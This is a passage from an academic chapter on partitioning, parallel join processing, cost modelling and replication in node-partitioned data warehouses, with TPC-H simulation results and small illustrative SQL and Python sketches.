have been proposed to improve response time. Although materialized views are useful in a context in which queries are known in advance, this is not the case when ad-hoc queries are posed. Parallel approaches are therefore important as they can be used alone or in conjunction with specialized structures to provide efficient processing for any query pattern at any time. In the past, there has also been a lot of work on implementing database systems over conventional shared-nothing architectures, as reviewed in DeWitt and Gray (1992). A shared-nothing architecture consists of a set of independent computer nodes that are connected through some network. Each node has its own storage devices and there is no expensive local area storage network with shared storage devices. Additionally, the NPDW does not assume any specialized fast interconnects between nodes, as it should work over a nondedicated local area network. In this context, performance is very dependent on strategies to partition data into nodes’ storage devices and processing into nodes’ processing units, respectively. It is also very dependent on achieving a balance between data exchange requirements and autonomous processing among nodes. The lack of fast specialized hardware and interconnects in the target environment means that there would be too large a penalty if relations were not carefully placed among nodes to explore parallelism power and reduce bottlenecks. This is the reason why one of the major concerns is to decide how to partition or cluster relations into nodes both on initial placement and subsequent reorganizations.
Partitioning, Parallel Join, and Cost Models
Several strategies have been proposed for efficient distributed placement and query processing. The semi-join operator (Bernstein & Chiu, 1981) applies selection and projection operations before sending data through the network. Other proposed strategies for efficient distributed query process-
ing include placement dependency (Liu, Chen, & Krueger, 1996), which uses dependency relationships between relations to co-locate fragments for faster processing. This and other alternative strategies are compared experimentally in Liu and Yu (1993). The most promising solutions to extra join overheads that characterize many successful parallel and distributed database systems in shared-nothing environments involve hashpartitioning large relations into nodes in order to minimize data exchange requirements (DeWitt & Gerber, 1985; Kitsuregawa, Tanaka, & Motooka, 1983). Parallel hash-join algorithms, also reviewed in Yu and Meng (1998), consider partitioning and allocating intervening relation fragments into processors or computer nodes for fast join processing. These strategies typically allocate a hash range to each processor, which builds a hash table and hashes relation fragments accordingly. In a shared-nothing environment, it often becomes necessary to exchange data between nodes in order to send tuples into the node that has been allocated the corresponding hash-value range for the join attribute. This process is called partitioning, if the relation is not partitioned yet, or repartitioning, if the relation is already partitioned but must be reorganized. Both operations can be costly because they may require heavy data exchange over the network connecting the nodes. In this work we will refer to partitioning (and placement) not as the operation of partitioning while processing a join but rather as an initial placement and sporadic reorganization task that decides which relations are to be divided or replicated into nodes and which partitioning attributes are to be used. Williams and Zhou (1998) review five major data placement strategies (size-based, access frequency-based, and network traffic based) and conclude experimentally that the way data is placed in a shared-nothing environment can have considerable effect on performance. Hua and Lee (1990) use variable partitioning (size and access frequency-based) and conclude that partitioning increases throughput for short
transactions but complex transactions involving several large joins result in reduced throughput with increased partitioning. Some of the most promising partitioning and placement approaches focus on query workload-based partitioning choice (Rao, Zhang, & Megiddo, 2002; Zilio, Jhingram, & Padmanabhan, 1994). These strategies use the query workload to determine the most appropriate partitioning attributes, which should be related to typical query access patterns. But while they are targeted at generic parallel databases and may require tight integration with a specific cost predictor and optimizer (Rao et al., 2002), we discuss generic data partitioning that is independent of the underlying database server and targeted at node-partitioned data warehouses (Furtado, 2004a, b, c). Consider the query Q = {R1.A2, R2.A4 | R1.A1=R2.A1 Λ R2.A1=R3.A1 Λ R3.A2=R4.A2 Λ R3.A3=R5.A3}, where Ri are relations and Ai are attributes. The join graph of Figure 1a is a graph where vertices correspond to attributes R.A participating in equi-joins and the edges depict the set of equi-
joins between those attributes. A component is a set of interconnected vertices and its edges. The join graph of the query workload (JGQW) shown in Figure 1b adds every join pattern occurring in the workload (the set of historical or expected queries), with a weight on each edge representing the frequency of occurrence of the corresponding join in the query workload (either a percentage or a number of occurrences) (Furtado, 2004a). The vertices of a component of a join graph form a set of relations that can be joined without requiring repartitioning and redistribution. The focus of the workload-based algorithms in Furtado (2004a, 2004b, 2004c) is to partition the relations in the join graph in a way that results in reduced repartitioning cost and redistribution requirements. Given this JGQW graph, a simple partitioning algorithm can assign partitioning attributes starting with the most frequent join (R3.A2, R2.A2 in the figure), to reduce the amount of repartitioning.
Figure 1. Join and query graphs for the example: (a) join graph and (b) join graph for query workload (JGQW)
More complex algorithms may search the space of possible alternative execution plans, evaluating a cost for each possible plan (Kossman & Stocker, 2000). In a data warehouse, there is an additional set of patterns that is important to guide the partitioning algorithm. Data warehouses have facts and dimensions, facts reference dimensions, and queries almost always join dimensions by their primary key. As a result, the algorithm we proposed in Furtado (2004c) partitions dimensions by primary keys (except small ones, which are replicated) and applies workload-based partitioning to facts. Several works refer to the cost of processing queries over a distributed database or to query optimization (query plan selection) in such a context (Kossman & Stocker, 2000; Sasha, Wang, & Tsong-Li, 1991; Steinbrunn, Moerkotte, & Kemper, 1997; Yu, Guh, Brill, & Chen, 1989). Yu et al. (1989) consider partitioning, local processing, and data communication costs in their cost model, to determine which relations should be partitioned and replicated, considering that no relation is prepartitioned. Algorithms and optimizations for parallel processing of multiway joins over hash-partitioned relations are considered by Sasha et al. (1991). The authors also introduce a cost model and propose algorithms to determine the most efficient join order for multiway joins over fully partitioned relations in a shared-nothing cluster. Some works (Kossman & Stocker, 2000; Steinbrunn et al., 1997) consider heuristic search for the best overall execution plan, since the search for the optimal plan is an NP-hard problem.
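As a minimal sketch of the simple workload-based choice described above (an illustration written for this discussion, not the authors' implementation), the partitioning attribute of each relation can be picked by summing the JGQW edge weights per join attribute; the small workload graph used below is hypothetical.
# Illustrative sketch: pick each relation's hash-partitioning attribute as the
# equi-join attribute with the highest total frequency in the workload (JGQW).
from collections import defaultdict

def choose_partitioning_attributes(jgqw_edges):
    # jgqw_edges: list of ((rel_a, attr_a), (rel_b, attr_b), weight)
    freq = defaultdict(float)                 # (relation, attribute) -> accumulated weight
    for (ra, aa), (rb, ab), w in jgqw_edges:
        freq[(ra, aa)] += w
        freq[(rb, ab)] += w
    choice = {}
    for (rel, attr), w in freq.items():
        if rel not in choice or w > freq[(rel, choice[rel])]:
            choice[rel] = attr
    return choice

# Hypothetical workload graph with edge weights (join frequencies).
edges = [(("R2", "A2"), ("R3", "A2"), 10),
         (("R3", "A2"), ("R4", "A2"), 8),
         (("R1", "A1"), ("R2", "A1"), 3),
         (("R3", "A3"), ("R5", "A3"), 6)]
print(choose_partitioning_attributes(edges))  # e.g., R3 -> A2, R2 -> A2
A cost-based variant would instead evaluate candidate assignments with a cost model such as the one discussed later in the chapter.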
Low Bandwidth and Early Selection
Another factor that affects the efficiency of partitioning schemes is the "available bandwidth." Given that the network interconnecting the computer nodes may be slow or nondedicated, or the system may be running several queries simultaneously, it is important to take into account the possibility of low available bandwidth. This
is a motivation for also considering partitioning schemes that favor replication such as strategies based on the partition and replicate strategy (PRS) of Yu et al. (1989), which partitions a single relation and replicates all others to process joins without repartitioning requirements. Another relevant approach to reduce both the amount of repartitioning and also of local processing at each node is to apply early-selection strategies. These apply selection conditions as early as possible to datasets so that much less tuples need to be processed and exchanged. A bitmap index (Chan & Ioannidis, 1998) contains one bitmap per possible value of a given attribute (or a coded bitmap with b bits for 2b possible values); the bitmap consists of one bit (or code) per row to indicate whether or not that row matches the respective attribute value. Chan and Ioannidis (1998) describe and analyze the use of bitmap indexes. When accessing a relation to answer a query, bitmaps are read and bitwise-operated (e.g., logical AND of bitmaps) to determine which relation tuples qualify for the query before even reading the relation itself. All processing and data exchanging is then applied to this reduced subset of tuples. Bitmap join indexes (O’Neil & Graefe, 1995) are very efficient materialized structures for avoiding costly joins. When bitmap join indexes are applied to a data warehouse schema, each bitmap indicates which fact rows correspond to each attribute value of a dimension table, representing the precomputed result of a join between the fact and a dimension table. Consider the simple example of a “Sales” fact, a “Product” dimension, and a “Brand” attribute within “Product.” A bitmap for Brand “X” associates a bit with each row of the Sales fact with a “1” bit if that row is a sale of Brand “X” and a “0” bit otherwise. A query for sales of brand “X” may scan the bitmap and then read only rows of Sales corresponding to that Brand. More importantly, it also avoids the need to join Sales with Product and therefore the need to repartition Part if it is partitioned and
not co-located with Sales. In summary, the use of early selection, and in particular bitmap join indexes, reduces the amount of data that must be exchanged very significantly, as long as there are selective conditions on the query patterns. Next we review replication for availability issues, as it is also a major concern in the low-reliability environment of the NPDW.
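To make the early-selection idea concrete, the following minimal sketch (an illustration under assumed structures, not the chapter's implementation) precomputes a join bitmap for one brand and then uses it to restrict which Sales rows are scanned, joined, or repartitioned:
# Illustrative sketch: a bitmap join index kept as a Python integer bit mask.
# Bit i is set when Sales row i refers to a product of the given brand.
def build_join_bitmap(sales_rows, product_dim, brand):
    mask = 0
    for i, row in enumerate(sales_rows):
        if product_dim[row["product_id"]]["brand"] == brand:
            mask |= 1 << i
    return mask

def select_rows(sales_rows, mask):
    # At query time only the flagged rows are processed further; the join with
    # the Product dimension (and its repartitioning) is avoided entirely.
    return [row for i, row in enumerate(sales_rows) if mask & (1 << i)]

product = {1: {"brand": "X"}, 2: {"brand": "Y"}}
sales = [{"product_id": 1, "amount": 10}, {"product_id": 2, "amount": 7}, {"product_id": 1, "amount": 3}]
brand_x = build_join_bitmap(sales, product, "X")   # precomputed once, like an index
print(select_rows(sales, brand_x))                 # two rows qualify
Several such bitmaps can be combined with bitwise AND/OR before any tuple of the fact is read.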
Replication for Availability
A discussion of availability for node-partitioned data warehouses brings up several issues like network failures, data loading failures, or availability monitoring. Each of these issues requires specific solutions. For instance, network failures can be accommodated using backup connections. We concentrate on handling the possible unavailability of computing nodes, guaranteeing efficient availability, and promoting manageability. The objective is that the system be always-on and always efficient even when nodes are unavailable or entire parts of it are taken off-line for maintenance and management functions, such as loading with new data or other DBA functionality. Efficient node availability can be achieved via the use of replicas. A replica is a "standby" copy of some data that can be activated at any moment in case of unavailability or failure of the node holding the "original," so that processing resumes as usual. If processing with unavailable nodes is implemented efficiently, unavailability becomes less onerous to the whole system and it becomes feasible to have nodes unavailable or to stop a set of nodes for data loading, maintenance, upgrading, or other management activities without any major repercussions to processing. Replica placement has been studied in different contexts, from RAID disks (Patterson, Gibson, & Katz, 1998) to the context of generic parallel and distributed databases. Replication strategies for shared-nothing systems range from mirrored disk drives (Tandem, 1987) to chained declustering (Hsiao & DeWitt, 1990a, b, 1991) or interleaved
declustering (Teradata, 1985). Copeland and Keller (1989) compare some of these high-availability media recovery techniques. There are also recent works on replication (Coloun, Pacitti, & Valduriez, 2004; Lin, Kemme, & Jimenez-Peris, 2005; Pacitti, Özsu, & Coulon, 2003), but the emphasis is on transaction-related consistency issues. In general, most works focus on generic replication strategies for availability considering nonpartitioned relations and OLTP workloads, while in this chapter we briefly discuss and evaluate replication in the specific node-partitioned data warehouse context. An extended discussion on the subject is available in Furtado (2005c).
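As a brief illustration of one of these schemes (a sketch added here; the chapter's own replica design is discussed later), chained declustering places the backup copy of each partition on a neighboring node, so that a single node failure leaves every partition available somewhere:
# Illustrative sketch: chained-declustering style placement of primaries and backups.
def chained_declustering(n_nodes):
    placement = {}
    for node in range(n_nodes):
        placement[node] = {"primary": node,               # node's own partition
                           "backup": (node - 1) % n_nodes}  # backup of its predecessor's
    return placement

def surviving_partitions(placement, failed_node):
    # After a single failure, every partition is still held by some surviving node.
    available = set()
    for node, parts in placement.items():
        if node != failed_node:
            available.add(parts["primary"])
            available.add(parts["backup"])
    return available

print(surviving_partitions(chained_declustering(4), failed_node=2))  # {0, 1, 2, 3}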
PARTITIONING AND PROCESSING OVER THE NPDW
In a partitioning scheme, each relation can either be partitioned (divided into partitions or fragments), copied in its entirety, or placed into a single node of a group of nodes. We simplify the discussion by considering only one group (all nodes) and homogeneity between nodes, in order to concentrate on the core partitioning and processing issues. Generically, if a relation is large or very large, partitioning is the choice that drives faster processing. On the other hand, very small relations can be replicated to avoid the need to repartition other very large datasets that may need to be joined with them. In practice, the decision on replication vs. partitioning for each relation can be taken by a cost-based optimizer that evaluates alternative execution plans and partitioning scenarios to determine the best one. Horizontally-partitioned relations can typically be divided using a round-robin, random, range, or hash-based scheme. We assume horizontal hash-partitioning, as this approach facilitates key-based tuple location for parallel operation. Partitioning is intimately related to processing issues. Therefore, first we describe generic query
processing over the NPDW. Then we focus on parallel join and partitioning alternatives.
Generic Processing over the NPDW
Query processing over a parallel shared-nothing database, and in particular over the NPDW, follows roughly the steps in Figure 2(b). Figure 2(a) illustrates a simple sum query example over the NPDW. In this example the task is divided among all nodes, so that each node needs to apply exactly the same initial query on its partial data, and the results are merged by applying a merge query at the merging node over the partial results coming from the processing nodes. If the datasets could be divided into N nodes and processed independently, each node would process its part (1/N) independently with a speedup of approximately N, and only the merge part of the query would represent extra overhead. More generically, the typical query processing cycle implemented by the query processing middle layer is shown in Figure 2(b) and an example is given in Figure 3. A query is executed in steps. Step 1 "Rewrite Query" prepares the node and merge query components from the original submitted query. Step 2 "Send Query" forwards the node query to all nodes, which process the query locally in step 3. Each node then sends its partial result to the submitter node (step 4), which applies the merge query in step 5. Step
6 redistributes results to processing nodes if required (for some queries containing subqueries, more than one processing cycle may be required). The query processing middle layer transforms queries into node queries and controls repartitioning requirements for processing operations such as the parallel join. In steps 1 and 2 of Figure 3 we can see that query aggregation expressions are replaced by aggregation primitives to be computed at each node and merged afterwards to obtain the results. The most common primitives are: Linear sum (LS = SUM(X)); Sum of squares (SS = SUM(X^2)); Number of elements (N); and Extremes (MAX and MIN). Although in Figure 3 every node computes partial aggregations for all aggregation groups, aggregation can also be computed by assigning the computation of specific aggregation groups to specific nodes (Shatdal & Naughton, 1995). A detailed study and evaluation of query processing issues in the NPDW is available in Furtado (2005a). The repartitioning operation of step 3R in Figure 2(b) is necessary whenever a partitioned dataset needs to participate in a join but is not partitioned by the join attribute. Each node is assigned a hash range for the join key, and every node needs to send to every other node the tuples it has that belong to the hash range corresponding to that node.
Figure 2. Query processing steps in NPDW: (a) example query (b) query processing steps
Figure 3. Basic aggregation query steps
0. Query submission:
Select sum(a), count(a), average(a), max(a), min(a), stddev(a), group_attributes
From fact, dimensions (join)
Group by group_attributes;
3. Nodes compute partial results:
Select sum(a), count(a), sum(a x a), max(a), min(a), group_attributes
From fact, dimensions (join)
Group by group_attributes;
5. Results merging:
Select sum(suma), sum(counta), sum(suma) / sum(counta), max(maxa), min(mina), (sum(ssuma) - sum(suma)^2 / sum(counta)) / sum(counta), group_attributes
From UNION_ALL(PRqueryX), dimensions (join)
Group by group_attributes;
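Read together, the partial results of step 3 are combined in step 5 using only the primitives; the short sketch below (illustrative, not the middle layer's code) mirrors those merge formulas:
# Illustrative sketch: merging partial aggregation primitives from the nodes.
# Each partial is (LS, SS, N, MAX, MIN) computed over one node's fragment.
def merge_partials(partials):
    ls = sum(p[0] for p in partials)          # global linear sum
    ss = sum(p[1] for p in partials)          # global sum of squares
    n  = sum(p[2] for p in partials)          # global count
    mx = max(p[3] for p in partials)
    mn = min(p[4] for p in partials)
    avg = ls / n
    var = (ss - ls * ls / n) / n              # variance from SS, LS and N
    return {"sum": ls, "count": n, "avg": avg, "max": mx, "min": mn, "var": var}

# Example with two hypothetical node results over the values {1,2} and {3,4}.
print(merge_partials([(3, 5, 2, 2, 1), (7, 25, 2, 4, 3)]))  # avg 2.5, var 1.25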
The repartitioning operation should be implemented as efficiently as possible to minimize its cost. We assume a switched network (the cost of repartitioning would be larger on a shared-media, hub-based network). A simple parallel repartitioning algorithm would be: number the N nodes sequentially; then, for i = 1 to N-1, each node sends in round i the buffer of tuples destined for the node whose number is i positions ahead of its own (modulo N), so that different pairs of nodes exchange data simultaneously.
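The following sketch illustrates one such round-based exchange schedule (a reconstruction written for illustration, since the original pseudo-code is truncated in this copy; the exact loop used by the authors may differ):
# Illustrative sketch: hash-repartition a local fragment and schedule the exchange
# so that in round i node n ships its bucket to node (n + i) mod N.
def hash_node(join_key, n_nodes):
    return hash(join_key) % n_nodes            # hash range assigned to each node

def repartition_schedule(node_id, local_tuples, key, n_nodes):
    buckets = {dest: [] for dest in range(n_nodes)}
    for t in local_tuples:
        buckets[hash_node(t[key], n_nodes)].append(t)
    rounds = []
    for i in range(1, n_nodes):                # N-1 communication rounds
        dest = (node_id + i) % n_nodes
        rounds.append((i, dest, buckets[dest]))  # (round, destination, tuples to send)
    return buckets[node_id], rounds              # tuples kept locally, plus the send plan

kept, plan = repartition_schedule(0, [{"o_orderkey": 7}, {"o_orderkey": 12}], "o_orderkey", 4)
On a switched network the pairs formed in each round can transfer their buffers in parallel without collisions.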
Figure 6. Node contents for PRS and PFRD-H partitioning strategies: (a) PRS partitioning, and (b) PFRD-H partitioning
• Partition and replicate strategy (PRS): Partition a single relation and replicate all the other relations in this case. This strategy allows joins to be processed without any data exchange between nodes, but the overhead of processing large replicated relations can be prohibitive. With PRS, the join execution plan of Figure 5(b) would be executed without any data exchange between nodes, but each node would need to process the full O and PS relations, which are 18 and 7.5 GB in size considering TPC-H with 100 GB (scale factor 100). In order to avoid replicating very large relations, a modified strategy is to replicate dimensions and partition every fact, while also co-locating LI and O:
• Hash-partition fact and replicate dimensions strategy (PFRD-H): Partition the relations identified as facts by the user (LI, O, and PS in TPC-H), co-locating LI and O. With PFRD-H, the execution plan of Figure 4b requires repartitioning of only two datasets: the intermediate result LI-O-P-S and relation PS. The join between LI and O is a LocalJ.
• Workload-based partitioning (WBP): A workload-based strategy where hash-partitioning attributes are determined based on schema and workload characteristics.
Figure 7. WBP partitioning
We use the strategy proposed in Furtado (2004c). The partitioning algorithm is:
1. Dimensions: Small dimensions are replicated into every node (and optionally cached in memory). Non-small dimensions can simply be hash-partitioned by their primary key. This is because that attribute is expected to be used in every equi-join with facts, as the references from facts to dimensions correspond to foreign keys. The determination of whether a dimension is small can be cost-based or, for simplicity, based on a user-defined threshold (e.g., every relation with less than 250 MB is to be replicated and those with less than 100 MB are to be cached in memory for faster access). For our experiments we have used this simple approach, but we describe a cost model and discuss the search for optimal partitioning in the next section.
2. Facts: The objective is to find the hash-partitioning attribute that minimizes repartitioning costs. A reasonable approximation to this objective is to determine the most frequent equi-join attribute used by the relation. To do this, the partitioning strategy looks at the frequency of access to other partitioned relations and chooses the most frequent equi-join attribute with those relations as the partitioning attribute.
We have described this process in the second section. A more complex approach involves the search for optimal partitioning, as described in the next section. By co-locating relation fragments that are frequent equi-join targets, this simple strategy significantly reduces repartitioning requirements (we have determined experimentally that WBP achieves an improvement of about 50% over straightforward primary-key-based partitioning (PK) when executing the query of Figure 5 under the same conditions described later in the experiments). Figure 7 shows the partitioning that resulted from applying the WBP strategy to the TPC-H query set. Concerning the execution plan of Figure 4b, this strategy allows the joins LI to O and LI-O-P-S to PS to be processed as LocalJ. Repartitioning is necessary only for the intermediate dataset LI-O.
• WBP with bitmap join indexes (WBP+JB): We have materialized join bitmaps in every node for the attributes (p_brand, n_name, o_orderpriority, ps_availqty) to speed up the query of Figure 5. For instance, before scanning the LI relation, the associated bitmap join indexes, such as the one for Brand x, are scanned. This way, only the LI rows associated with Brand x are processed any further, including when repartitioning data.
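A minimal sketch of the WBP heuristic described above (choosing, for each fact, its most frequent equi-join attribute with other partitioned relations) could look as follows; the workload representation used here is an assumption for illustration, not the chapter's actual implementation.

from collections import Counter

def choose_partitioning_attribute(fact, workload, partitioned_relations):
    """Pick the most frequent equi-join attribute between `fact` and other
    partitioned relations; the workload is a list of equi-joins of the form
    (relation_a, attr_a, relation_b, attr_b, access_frequency)."""
    counts = Counter()
    for rel_a, attr_a, rel_b, attr_b, freq in workload:
        if rel_a == fact and rel_b in partitioned_relations:
            counts[attr_a] += freq
        elif rel_b == fact and rel_a in partitioned_relations:
            counts[attr_b] += freq
    return counts.most_common(1)[0][0] if counts else None

# Toy TPC-H-like workload: LI joins O on the order key far more often than it
# joins PS, so LI would be hash-partitioned on l_orderkey.
workload = [
    ("LI", "l_orderkey", "O", "o_orderkey", 10),
    ("LI", "l_partkey", "PS", "ps_partkey", 3),
]
print(choose_partitioning_attribute("LI", workload, {"O", "PS"}))  # -> l_orderkey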
In the next section we review a generic cost model for the strategies, taking into account factors such as the number of nodes and network bandwidth.
COST MODEL
The main processing costs (listed next) are repartitioning, data communication, local processing, and merging:
a. Repartitioning cost (RC): Partitioning a relation consists of retrieving the relation from secondary memory, dividing it into fragments by applying a hash function to a join attribute, and assigning buffers for the data to send to other nodes. Repartitioning is similar but involves a fragment in each node. Multiple nodes can rehash and exchange relation fragments simultaneously.
b. Data communication cost (DC): The data communication cost is monotonically increasing with the size of the data transferred. We assume a switched network, as this allows different pairs of nodes to send data simultaneously (with no collisions). This, in turn, allows the repartitioning algorithm to be implemented more efficiently.
c. Local processing cost (LC): The local processing cost for the join operation typically depends on whether the join is supported by fast access paths such as indexes and on the size of the relations participating in the join. For simplicity, we assume these costs also increase monotonically with the relation sizes, although, in practice, this depends on several parameters, including memory buffer size.
d. Merging cost (MC): The merging cost is related to applying a final query to the collected partial results at the merging node. We do not consider this cost, as it is similar in every case and independent of the other ones.
Given these items, the next objective is to represent the cost as an expression involving the local processing and repartitioning costs (here we consider the data communication cost within the repartitioning cost). We define weighting parameters as in Sasha et al. (1991): a partitioning cost weight, β, and a local processing cost weight, α, so that β/α denotes the ratio of partitioning costs to local processing costs, for example, ~2 (Sasha et al., 1991). A cost-based optimizer is used to determine the most appropriate execution plan (Kossman & Stocker, 2000; Steinbrunn et al., 1997). A join order determines the order by which relations are joined. Assuming the datasets are joined using an algorithm such as parallel hybrid hash-join, at each step an additional relation is joined to the current intermediate result set IRi (selection and projection operators are applied as soon as possible to reduce the size of the datasets that need to be processed). Given the result set IRi and a relation Rj, equations (1) and (2) represent the processing costs for a single server and for a node-partitioned system where Rj is replicated into all nodes and IRi is partitioned:

one-server system: α × (IRi + Rj)   (1)

replicated join: α × (IRi/N + Rj)   (2)

Equations (3) and (4) represent the local processing cost (LC) and repartitioning cost (RC) when both datasets are partitioned. The RC cost in (4) is only incurred when the datasets are not co-located.

LC for local join: α × (IRi/N + Rj/N)   (3)

RC for non-co-located datasets: β × (IRi/N − IRi/N^2)   (4)

The value IRi/N in equation (4) is the fraction of IRi that is at each node, and IRi/N^2 is the fraction of that quantity that already has the
correct hash value for that node, therefore requiring no repartitioning. By subtracting (3) from (2) we get the advantage of partitioning over replicating when both datasets are co-located. However, if the datasets are not co-located, we must also subtract equation (4) from this value. If β is large (small available bandwidth), this RC cost can become dominant and replication becomes the best choice. The WBP strategy improves the performance of the system by making each node process 1/N of relations and intermediate results as much as possible (3), while simultaneously reducing repartitioning requirements (4) by placing datasets based on the workload. PRS, on the other hand, focuses on eliminating repartitioning requirements (4) to handle contexts with low bandwidth, but it needs to process whole relations (2). Finally, WBP+JB uses bitmaps over the nodes to avoid the repartitioning cost (4), while simultaneously also reducing local processing costs. Given a cost model, a cost-based optimizer evaluates the cost of alternative execution plans (including join orders) for alternative partitioning options (partition or replicate relations). In practice, this cost model is replaced by evaluating the cost of operations, as our simulator, described next, does.
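As a small numerical illustration of equations (1)-(4), the following sketch compares replicating Rj against partitioning it for two values of β; the sizes and weights are made-up values chosen only to show how the decision flips when bandwidth is scarce.

# Sketch of cost expressions (2)-(4); sizes are in arbitrary units.
def replicated_join_cost(ir_i, r_j, n, alpha):
    return alpha * (ir_i / n + r_j)                      # equation (2)

def partitioned_join_cost(ir_i, r_j, n, alpha, beta, colocated):
    cost = alpha * (ir_i / n + r_j / n)                  # equation (3)
    if not colocated:
        cost += beta * (ir_i / n - ir_i / n**2)          # equation (4)
    return cost

# With beta close to alpha, partitioning wins even without co-location;
# with a very large beta (little bandwidth), replication can win.
for beta in (2.0, 50.0):
    part = partitioned_join_cost(1000, 800, 25, 1.0, beta, colocated=False)
    repl = replicated_join_cost(1000, 800, 25, 1.0)
    print(f"beta={beta}: partitioned={part:.1f} replicated={repl:.1f}")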
COMPARATIVE ANALYSIS OF PARTITIONING ALTERNATIVES The partitioning strategies described before can be characterized as more replication-oriented (PRS, PFRD-H) and more partitioning-oriented (WBP, WBP+JB) ones. Partitioning-oriented strategies are very efficient in an environment with fast interconnections and available bandwidth, because repartitioning is cheap in those environments. On the other hand, the advantage of PRS (and PFRD-H) is that it places lower requirements on the interconnections, with fewer data exchange requirements. However, the drawback is the size of replicated relations that must be processed in
every node. Our comparative analysis is based both on a simulator environment, to test several possible configurations (e.g., number of nodes, available bandwidth), and on actual executions, to help validate the results and analyze the strategies for the TPC-H query set. We have built a discrete-event simulation environment, which uses the basic set of parameters listed in Figure 8. The simulator estimates the cost of the individual operations that need to be performed to execute the query. Operation tasks are submitted as required, and resource utilization for disk access, memory and bus, processor, and network send/receive is used to determine the completion time for those tasks. For instance, the cost of a hybrid hash-join is related to the cost of scanning the relations from secondary storage, bucketizing them, building a hash table, and probing into the hash table. The cost to join relations R1 and R2, considering the individual scan costs, is scanR1 + scanR2 + 2 × (scanR1 + scanR2) × (1 − q), where q denotes the fraction of R1 whose hash table fits in memory (Steinbrunn et al., 1997). Disk access rates (measured in MB/sec) are then used to complete the evaluation of the cost. Similar strategies are applied to evaluate the repartitioning cost, which involves scanning the datasets, operating on them, assigning buffers, and sending to destination nodes (with a given network bandwidth in MB/sec). Typical numbers of instructions used to process different low-level operations and to send and receive messages (network) were included as parameters to the simulator (Stöhr, Märtens & Rahm, 2000). For these experiments we used TPC-H with 100 GB and the generic query Qa of Figure 5a, with default selectivities for attribute values (x, y, w, z) of (0.7, 0.7, 0.2, 0.2), respectively. Figure 9 shows the response time (a) and speedup (b) vs. the number of nodes for query Qa. The performance of replica-based strategies (especially PRS) is much worse than that of partitioning-based ones (WBP, WBP+JB), because nodes have to process large replicated datasets.
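As a concrete illustration of the join-cost estimate just described, a simplified version in code might read as follows; the disk-rate conversion and the example sizes are assumptions made for illustration only.

def hybrid_hash_join_cost(scan_r1, scan_r2, q):
    """Simplified hybrid hash-join cost in scan units:
    scanR1 + scanR2 + 2 * (scanR1 + scanR2) * (1 - q),
    where q is the fraction of R1 whose hash table fits in memory."""
    return scan_r1 + scan_r2 + 2 * (scan_r1 + scan_r2) * (1 - q)

def scan_cost(relation_mb, disk_rate_mb_s=100):
    """Translate a relation size into seconds using the disk transfer rate."""
    return relation_mb / disk_rate_mb_s

# Joining a 2 GB fragment with a 500 MB fragment, with 60% of R1 in memory.
cost = hybrid_hash_join_cost(scan_cost(2000), scan_cost(500), q=0.6)
print(f"estimated join cost: {cost:.1f} s")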
Figure 8. Basic parameters for simulation
Disk: seek time 10 ms; settle time + controller per access 3 ms, plus a delay of 1 ms per page; sequential transfer rate per node 100 MB/s.
Processing (number of instructions): read page 3,000; process bitmap page 1,500; extract and hash/probe table row 250; CPU speed 50 MIPS; memory buffer 500 MB per node.
Network: connection speed (default) 100 MB/s; send message 1,000 + #B instructions; receive message 1,000 + #B instructions; message sizes 128 B (small) and 1 page (4 KB) (large).
Figure 9. Response time and speedup vs. number of nodes (100 MB/s) (log plots): (a) response time vs. number of nodes, and (b) speedup vs. number of nodes
Additionally, early selection (WBP+JB) improves response time further, as it reduces the amount of data that must be processed and repartitioned. Of course, bitmap join indexes must be available, and their usefulness depends on the selectivity of the query's selection conditions. On the other hand, if the available network bandwidth is low, strategies using replicas (e.g., PRS, PFRD-H) can exhibit better performance relative to those relying on partitioning (WBP), as shown in Figure 10a. Still, early selection (WBP+JB) was the best strategy because it is not very dependent on repartitioning.
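A minimal sketch of this early-selection idea, with the join bitmap represented simply as a Python set of matching row positions (an illustrative simplification of a real bitmap join index), is:

def early_select(li_rows, brand_bitmap):
    """Keep only the LI rows whose position is set in the join bitmap for the
    requested brand, so that later joins and repartitioning touch less data."""
    return [row for pos, row in enumerate(li_rows) if pos in brand_bitmap]

li_rows = [{"l_orderkey": 1}, {"l_orderkey": 2}, {"l_orderkey": 3}]
brand_x_bitmap = {0, 2}          # positions of LI rows that join to Brand x parts
print(early_select(li_rows, brand_x_bitmap))   # rows 0 and 2 survive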
We also subjected our simulator to conformance tests, to evaluate whether its simulation is sufficiently accurate for our purposes. Figure 11 shows a result from those tests. We ran WBP and PRS on a system with the following characteristics: TPC-H 25 GB; a commercial DBMS; each node with a 3 GHz Intel Pentium 4 processor, 1 GB of memory, and a 200 GB SATA II disk; 1 Gbps network; query Qa. Cost-based optimization was used, the schema objects were analyzed, and the best query plan suggestion was chosen (the default execution plan had very poor performance for PRS). The results show that the simulated response time was reasonably accurate. Although its prediction for PRS was slightly higher than the actual response time for more than 100 nodes, the advantage of WBP is still very evident from these results. Finally, we also ran the whole TPC-H query set against WBP and PRS to compare replication vs. partitioning.
Figure 10. RT vs. Mbps (100 nodes)
Figure 11. Simulation vs. real execution (25 GB, 1 Gbps)
Figure 12. Size and layout of relations involved in parallel joins over PRS
G1 (Partitioned): Q1, Q6, Q15
G2 (Partitioned + Medium Replicated): Q11, Q14, Q19
G3 (Partitioned + Large Replicated): Q3, Q5, Q7, Q9, Q10, Q12, Q16
G4 (Partitioned + Large Replicated + Medium Replicated): Q4, Q8, Q13, Q22
Figure 13. Grouped speedup results for PRS and WBP over 25 nodes
These runs used the following system: 25 nodes; TPC-H 50 GB; each node with a Pentium III 866 MHz CPU, an 80 GB IDE hard disk, and 512 MB of RAM; 100 MB/s switched network. For these results we consider the TPC-H query set divided into groups (Figure 12) according to the sizes of the replicated relations accessed and processed by the joins. Group G1 accesses only a partitioned relation (LI or PS). The other groups include references to replicated relations with sizes in the following intervals: Small (0, 500 MB); Medium (500 MB, 5 GB); Large (5 GB, ∞). The speedup intervals (T lines) of Figure 13 are the range of speedup values considering all
queries in a group. From the results we can see that the larger the replicated relations, the smaller the PRS speedup (G2, G3, and G4), with a large penalty for processing heavy ReplicaJ joins. WBP achieved near-linear speedup for all queries, while PRS showed very low speedup for most queries.
REPLICATION FOR NONSTOP AVAILABILITY ON NPDW In this section we discuss briefly alternative replication choices within the NPDW for always-on,
always efficient processing, allowing multiple nodes to be off-line simultaneously for data loading, maintenance, and other DBA functionality. Figure 14 shows the schema of a node X with an availability-related replica from another node Y. Notice that some relations are already replicated by placement (S and C). Node X can now replace node Y in case of unavailability of Y by simply including Y's partitions in the processing. The simplest replica placement strategy, full replicas (FRs), involves replicating each node's data into at least one other node. In case of failure of one node, a node containing the replica resumes the operation of the failed node. A simple placement algorithm considering R replicas is:

Number the nodes linearly;
For each node i
